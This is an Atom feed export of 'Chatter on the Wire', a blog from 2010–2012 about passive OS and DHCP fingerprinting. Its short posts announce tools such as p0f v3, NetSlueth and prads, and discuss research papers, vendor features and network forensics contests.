<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-5343200444918965958</id><updated>2012-01-27T13:24:02.594-07:00</updated><category term='packetfence'/><category term='SNMP'/><category term='enterasys'/><category term='p0f'/><category term='tools'/><category term='active'/><category term='DHCP fingerprint manager'/><category term='fingerprinting'/><category term='EFFormat'/><category term='blackhat'/><category term='fingerprint'/><category term='perl'/><category term='AP'/><category term='passive'/><category term='ESX'/><category term='EDHCPfingerprint'/><category term='fpc'/><category term='forensics contest'/><category term='telnet'/><category term='coovachilli'/><category term='tcp stack'/><category term='os fingerprinting'/><category term='web fingerprinting'/><category term='dhcp fingerprinting'/><category term='Fingerprint Editor'/><category term='linux'/><category term='scanner'/><category term='networkminer'/><category term='osfuscate'/><category term='os identification'/><category term='Scheduled Tasks'/><category term='ICMP'/><category term='driftnet'/><category term='trojan'/><category term='sans'/><category term='satori'/><category term='wall-wart'/><category term='dfrws'/><category term='network forensics'/><category term='pentesting'/><category term='802.11'/><category term='software'/><category term='dhcp.xml'/><category term='xprobe2'/><category term='insecure magazine'/><category term='dhcp'/><category term='dhcp client'/><category term='AD'/><category term='Application Fingerprinting'/><category term='meraki'/><title type='text'>Chatter on the Wire: How excessive network traffic gives away too much!</title><subtitle 
type='html'>OS Fingerprinting info, primarily geared towards passive OS identification means, but also links to active OS identification.</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>77</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-6745670830490603464</id><published>2012-01-27T13:24:00.000-07:00</published><updated>2012-01-27T13:24:02.603-07:00</updated><title type='text'>NetSlueth</title><content type='html'>The Alpha version of NetSlueth was posted to the fingerbank discussion list in the past week.  I'd tagged it to go back and look at, and unlike most of the time I tag things for follow-up, I did it in less than 6 months!&lt;br /&gt;&lt;br /&gt;I guess it was just 2 days ago, wow, not sure I've ever gotten back that quick.&lt;br /&gt;&lt;br /&gt;Anyway, partial info from the list:&lt;br /&gt;"I basically used tshark for low level processing, allowing me to focus on the logic of the analysis. It needs A LOT more work, including improving my sloppy coding skills. It requires a full installation of Wireshark and .Net Framework or later on the machine. 
I'm going to make it fully mono compatible shortly."&lt;br /&gt;&lt;br /&gt;By using tshark he took a lot of the headache out of coding the underlying pieces that I've dealt with in Satori.  Anyway, I ran some initial pcap files I had around through it and it seemed to do quite nicely at identifying the OS running on them.  I didn't have any luck with a live capture, but I didn't dig around very long trying to figure out why either!&lt;br /&gt;&lt;br /&gt;I need to dig into it more and see which protocols they are utilizing, but if you need another little tool, this one may be worth looking at!</content><link rel='related' href='http://www.netgrab.co.uk/download/index.html' title='NetSlueth'/><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/6745670830490603464/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=6745670830490603464' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/6745670830490603464'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/6745670830490603464'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2012/01/netslueth.html' title='NetSlueth'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 
src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-9186522448565387826</id><published>2012-01-12T18:19:00.002-07:00</published><updated>2012-01-12T18:19:42.856-07:00</updated><title type='text'>Fingerprint Editor 1.00.08</title><content type='html'>Jeff recompiled his fingerprint editor for us with the latest .xml files from my fingerprint database!</content><link rel='related' href='http://cycocrew.pagesperso-orange.fr/delphi/FingerprintEditor-1.00.08-Setup.exe' title='Fingerprint Editor 1.00.08'/><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/9186522448565387826/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=9186522448565387826' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/9186522448565387826'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/9186522448565387826'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2012/01/fingerprint-editor-10008.html' title='Fingerprint Editor 1.00.08'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 
src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-5234783051449276710</id><published>2012-01-10T18:04:00.001-07:00</published><updated>2012-01-10T18:04:59.697-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='p0f'/><category scheme='http://www.blogger.com/atom/ns#' term='satori'/><category scheme='http://www.blogger.com/atom/ns#' term='passive'/><title type='text'>p0f v3</title><content type='html'>And I thought MZ gave up on p0f after no updates to v2 in years.  I guess I'm proven wrong....&lt;br /&gt;&lt;br /&gt;== What's new ==&lt;br /&gt;&lt;br /&gt;Version 3 is a complete rewrite, bringing you much improved SYN and SYN+ACK fingerprinting capabilities, auto-calibrated uptime measurements, completely redone databases and signatures, new API design, IPv6 support (who knows, maybe it even works?), stateful traffic inspection with thorough cross-correlation of collected data, application-level fingerprinting modules (for HTTP now, more to come),&lt;br /&gt;and a lot more. &lt;br /&gt;&lt;br /&gt;----&lt;br /&gt;&lt;br /&gt;On my list to test in the near future and provide some new fingerprints.  
Assuming time permits, and depending on how well it works (I have no doubt it works well, but...), I will look at what it is doing and see if I can incorporate new stuff/ideas into a newer tcp plugin for Satori.</content><link rel='related' href='http://lcamtuf.coredump.cx/p0f3/' title='p0f v3'/><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/5234783051449276710/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=5234783051449276710' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/5234783051449276710'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/5234783051449276710'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2012/01/p0f-v3.html' title='p0f v3'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-2246686242878306103</id><published>2011-11-05T21:04:00.000-06:00</published><updated>2011-11-05T21:04:00.968-06:00</updated><title type='text'>Using Machine Learning Techniques for Advanced Passive Operating System Fingerprinting</title><content type='html'>Ok, guess I'm about a year out on this, but....&lt;br /&gt;&lt;br /&gt;Anytime someone mentions your work in their master's thesis, it is a nice thing to mention it and post a link!&lt;br 
/&gt;&lt;br /&gt;His thesis can be found &lt;a href="http://eprints.eemcs.utwente.nl/18789/01/Julius_-_Final_version.pdf"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;He initially covers a lot of the same ground I did in my paper on OS Fingerprinting, but also covers a few tools and newer techniques that were not around back in 2005 or whenever it was that I wrote my paper on this subject.  This is only in regards to the start of the paper, giving a quick overview of fingerprinting techniques and tools; he then dives deeply into other things that go well beyond what I've covered previously.  I guess it is a master's thesis, so it had better!&lt;br /&gt;&lt;br /&gt;He does bring up a good point/issue with passive fingerprinting and IPsec, which, since I'm working on a final project for school right now discussing network security and IPsec, may be worth me looking into a bit more!</content><link rel='related' href='http://eprints.eemcs.utwente.nl/18789/01/Julius_-_Final_version.pdf' title='Using Machine Learning Techniques for Advanced Passive Operating System Fingerprinting'/><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/2246686242878306103/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=2246686242878306103' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/2246686242878306103'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/2246686242878306103'/><link rel='alternate' type='text/html' 
href='http://chatteronthewire.blogspot.com/2011/11/using-machine-learnign-techniques-for.html' title='Using Machine Learning Techniques for Advanced Passive Operating System Fingerprinting'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-3704617779320137399</id><published>2011-11-05T20:33:00.000-06:00</published><updated>2011-11-05T20:33:08.354-06:00</updated><title type='text'>DLink cloud managed solutions - offer dhcp fingerprinting in basic option</title><content type='html'>I don't have a lot of details here.  I've been sitting on a lot of "OS fingerprinting" notices the past 6 months, been so busy with work and school I haven't posted much, but have some time to catch up this weekend.&lt;br /&gt;&lt;br /&gt;Anyway, DLink has a cloud based solution that does DHCP OS Fingerprinting; more and more every day seem to finally be catching on to how to use this!&lt;br /&gt;&lt;br /&gt;One of many articles can be found &lt;a href="http://origin-www.bloomberg.com/apps/news?pid=20670001&amp;sid=aV7Q7XyE4DfU"&gt;here&lt;/a&gt;.</content><link rel='related' href='http://origin-www.bloomberg.com/apps/news?pid=20670001&amp;sid=aV7Q7XyE4DfU' title='DLink cloud managed solutions - offer dhcp fingerprinting in basic option'/><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/3704617779320137399/comments/default' title='Post Comments'/><link rel='replies' type='text/html' 
href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=3704617779320137399' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/3704617779320137399'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/3704617779320137399'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2011/11/dlink-cloud-managed-solutions-offer.html' title='DLink cloud managed solutions - offer dhcp fingerprinting in basic option'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-3397282908282355971</id><published>2011-11-05T20:22:00.000-06:00</published><updated>2011-11-05T20:22:36.426-06:00</updated><title type='text'>OS fingerprinting with IPv6</title><content type='html'>I was sad to see they didn't go into DHCPv6 at all in this, but the author goes into IPv4 versus IPv6 fingerprinting: some of what still works, and some possible new stuff.&lt;br /&gt;&lt;br /&gt;He did this for his GIAC Gold; maybe I should have used my DHCP presentation for Blackhat and gotten a Gold Cert on one of the many GIAC certs I hold.  
Oh well.&lt;br /&gt;&lt;br /&gt;Check out the paper &lt;a href="http://www.sans.org/reading_room/whitepapers/testing/os-fingerprinting-ipv6_33794"&gt;here&lt;/a&gt;.</content><link rel='related' href='http://www.sans.org/reading_room/whitepapers/testing/os-fingerprinting-ipv6_33794' title='OS fingerprinting with IPv6'/><link rel='enclosure' type='' href='http://www.sans.org/reading_room/whitepapers/testing/os-fingerprinting-ipv6_33794' length='0'/><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/3397282908282355971/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=3397282908282355971' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/3397282908282355971'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/3397282908282355971'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2011/11/os-fingerprinting-with-ipv6.html' title='OS fingerprinting with IPv6'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-4545505839717507758</id><published>2011-11-05T20:06:00.001-06:00</published><updated>2011-11-05T20:34:58.932-06:00</updated><title type='text'>ArubaOS 6.0.1.0 adds DHCP fingerprinting</title><content type='html'>They are using 
their own DB, but now the ArubaOS supports doing DHCP fingerprinting of devices on the network.  You can find the writeup &lt;a href="http://pbsplaza.nl/?p=238"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;It is good to see more products doing this!&lt;br /&gt;&lt;br /&gt;My original introduction to them doing this was this blog post:&lt;br /&gt;http://airheads.arubanetworks.com/vBulletin/showthread.php?p=11211&lt;br /&gt;&lt;br /&gt;There haven't been a lot of things published on this, but it is something new they've added recently.</content><link rel='related' href='http://pbsplaza.nl/?p=238' title='ArubaOS 6.0.1.0 adds DHCP fingerprinting'/><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/4545505839717507758/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=4545505839717507758' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/4545505839717507758'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/4545505839717507758'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2011/11/arubaos-6010-adds-dhcp-fingerprinting.html' title='ArubaOS 6.0.1.0 adds DHCP fingerprinting'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 
src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-8978377503559582381</id><published>2011-11-05T19:56:00.000-06:00</published><updated>2011-11-05T19:56:22.002-06:00</updated><title type='text'>Fingerbank presentation at Defcon 19</title><content type='html'>Ok, I knew Oliver did a presentation on fingerbank, but didn't realize it was recorded.&lt;br /&gt;&lt;br /&gt;It can be found &lt;a href="http://www.youtube.com/watch?v=FO2GaxWV3VM&amp;feature=related"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;I did find it interesting that he said he was introducing fingerbank when we did that back in 2007, but it did die off and they brought it back!&lt;br /&gt;&lt;br /&gt;Anyway, check it out if you want.</content><link rel='related' href='http://www.youtube.com/watch?v=FO2GaxWV3VM&amp;feature=related' title='Fingerbank presentation at Defcon 19'/><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/8978377503559582381/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=8978377503559582381' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/8978377503559582381'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/8978377503559582381'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2011/11/fingerbank-presentation-at-defcon-19.html' title='Fingerbank presentation at Defcon 
19'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-6468649112899024802</id><published>2011-08-24T09:37:00.000-06:00</published><updated>2011-08-24T09:37:39.524-06:00</updated><title type='text'>Fingerbank.org is back</title><content type='html'>The people at packetfence have brought fingerbank.org back.  It has been a while in the making, but they have 2 email lists set up now also to discuss unknown fingerprints and other topics on dhcp fingerprinting.&lt;br /&gt;&lt;br /&gt;You can see their writeup &lt;a href="http://www.packetfence.org/news/2011/article/new-sister-project-fingerbank-open-dhcp-fingerprints-database.html"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Glad to see it back!</content><link rel='related' href='http://fingerbank.org' title='Fingerbank.org is back'/><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/6468649112899024802/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=6468649112899024802' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/6468649112899024802'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/6468649112899024802'/><link rel='alternate' type='text/html' 
href='http://chatteronthewire.blogspot.com/2011/08/fingerbankorg-is-back.html' title='Fingerbank.org is back'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-7925186606718447932</id><published>2011-05-24T10:28:00.000-06:00</published><updated>2011-05-24T10:28:48.734-06:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='tools'/><title type='text'>New tools to be aware of for pcap stuff</title><content type='html'>streams:  http://www.honeynet.org/node/633?utm_source=feedburner&amp;utm_medium=feed&amp;utm_campaign=Feed%3A+HoneynetProjectAggregated+%28Blog+postings+from+honeynet.org%29&lt;br /&gt;splitting and other parsing:  http://www.netresec.com/?page=SplitCap&lt;br /&gt;raw capture (winpcap not required):  http://www.netresec.com/?page=RawCap&lt;br /&gt;&lt;br /&gt;I'm sure there are a ton more buried in my email that I've missed recently, but these all looked promising.</content><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/7925186606718447932/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=7925186606718447932' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/7925186606718447932'/><link rel='self' type='application/atom+xml' 
href='http://www.blogger.com/feeds/5343200444918965958/posts/default/7925186606718447932'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2011/05/new-tools-to-be-aware-of-for-pcap-stuff.html' title='New tools to be aware of for pcap stuff'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-3605760424186186223</id><published>2011-05-24T10:22:00.002-06:00</published><updated>2011-05-24T10:22:48.954-06:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='scanner'/><category scheme='http://www.blogger.com/atom/ns#' term='active'/><title type='text'>Directory Scanner</title><content type='html'>Not a tool I've played with, but on my list for one of these days if I ever have some time.&lt;br /&gt;&lt;br /&gt;Supposedly it can tell if it is AD, eDir, OpenLDAP, etc.</content><link rel='related' href='http://www.pentestit.com/2011/04/18/directoryscanner-directory-server-fingerprinting-tool/' title='Directory Scanner'/><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/3605760424186186223/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=3605760424186186223' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/3605760424186186223'/><link rel='self' type='application/atom+xml' 
href='http://www.blogger.com/feeds/5343200444918965958/posts/default/3605760424186186223'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2011/05/directory-scanner.html' title='Directory Scanner'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-2223238297450669791</id><published>2011-05-05T19:29:00.001-06:00</published><updated>2011-05-05T19:29:10.567-06:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='network forensics'/><category scheme='http://www.blogger.com/atom/ns#' term='forensics contest'/><title type='text'>Forensics Contest #8</title><content type='html'>Well, after a VERY long break they've released the latest puzzle.  This one has to do more with parsing and pulling info about wireless.  While I probably have the skills to do it, I'm not sure I'll participate in this one.  School is finishing up and my free time is very short in this next month.&lt;br /&gt;&lt;br /&gt;If nothing else I may just figure out the answers without writing any specific program to be released for it. &lt;br /&gt;&lt;br /&gt;It has been out a good week so far and I have yet to grab the pcap file and look it over.  
Satori will probably spit out an error as I have it set to reject wireless packets, since I haven't wanted to parse out the extra header info in the past.&lt;br /&gt;&lt;br /&gt;I may run it through a converter so Satori can at least read it in, though I'll lose most of what they want you to find with SSID stuff and beacon packets.</content><link rel='related' href='http://forensicscontest.com/2011/04/27/puzzle-8' title='Forensics Contest #8'/><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/2223238297450669791/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=2223238297450669791' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/2223238297450669791'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/2223238297450669791'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2011/05/forensics-contest-8.html' title='Forensics Contest #8'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-3061231533355276739</id><published>2011-01-01T12:20:00.000-07:00</published><updated>2011-01-01T12:20:57.966-07:00</updated><title type='text'>prads</title><content type='html'>After a break from programming for a while I think I'll take a look at 
some C programming again.  I'm not sure how much time I'll be able to put into it with work/school/life, but I'd like to take a look at C again if I can come up with an IDE I like to program in.  I really dislike most of the ones I've come across in the recent past.&lt;br /&gt;&lt;br /&gt;Anyway, the prads project seems a good place to get involved if I can dedicate some time. &lt;br /&gt;&lt;br /&gt;The main link for them is here:&lt;br /&gt;&lt;a href="http://gamelinux.github.com/prads/"&gt;http://gamelinux.github.com/prads/&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;The C stuff they've done so far covers most of what they had in the perl version before.  As my favorite stuff is DHCP, I'm going to see if I can write a new module to dump in there.  If things work out I'll give them the code, if not it will just be me getting my feet wet in C again.&lt;br /&gt;&lt;br /&gt;If nothing else maybe we can get some of the Satori fingerprints moved into their project.  If they eventually get everything done they want to they'll be doing a lot of what I originally planned on doing with Satori!</content><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/3061231533355276739/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=3061231533355276739' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/3061231533355276739'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/3061231533355276739'/><link rel='alternate' type='text/html' 
href='http://chatteronthewire.blogspot.com/2011/01/prads.html' title='prads'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-6706991393439810518</id><published>2010-09-29T19:34:00.000-06:00</published><updated>2010-09-29T19:34:53.215-06:00</updated><title type='text'>A few new updates</title><content type='html'>First, I've been working on DHCPv6 fingerprinting.  Not sure how many fingerprints I'll end up with in the end, but there is a DLL implemented, there is an XML file, and now, thanks to Jeff, there is an update to the editor!&lt;br /&gt;&lt;br /&gt;Fingerprint Editor 1.00.06 has been published here:&lt;br /&gt;http://pagesperso-orange.fr/cycocrew/delphi/FingerprintEditorSetup.exe&lt;br /&gt;&lt;br /&gt;He also updated the DEF File Editor to 1.00.04:&lt;br /&gt;http://pagesperso-orange.fr/cycocrew/delphi/DEFFileEditorSetup.exe&lt;br /&gt;&lt;br /&gt;I need to get back to SIP fingerprinting one of these days also.  
It was added to the editor back in 1.00.05 and I have a DLL and an XML file for it also, but I haven't worked much on the XML file there yet either.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5343200444918965958-6706991393439810518?l=chatteronthewire.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/6706991393439810518/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=6706991393439810518' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/6706991393439810518'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/6706991393439810518'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2010/09/few-new-updates.html' title='A few new updates'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-5028800877946239886</id><published>2010-08-02T20:06:00.000-06:00</published><updated>2010-08-02T20:06:06.079-06:00</updated><title type='text'>Forensics Contest #6 (yeah, the last contest)</title><content type='html'>But First....&lt;br /&gt;&lt;br /&gt;While it would have been nice to be at defcon and participate in contest #7, I didn't have that opportunity.  Nor, based on some of the emails I got, would I probably have done very well at it, since it appeared to be wireless packets that you had to glean info from.  
Who knows; we'll see once they post the ~50MB pcap file.&lt;br /&gt;&lt;br /&gt;Anyway, my netbook that I won from contest #6 came in about a week ago.  I just wanted to say thanks to Sherry, Eric and Jonathan for putting the contest together and to those that provided other support for it!  I look forward to the next contests!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5343200444918965958-5028800877946239886?l=chatteronthewire.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/5028800877946239886/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=5028800877946239886' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/5028800877946239886'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/5028800877946239886'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2010/08/forensics-contest-6-yeah-last-contest.html' title='Forensics Contest #6 (yeah, the last contest)'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 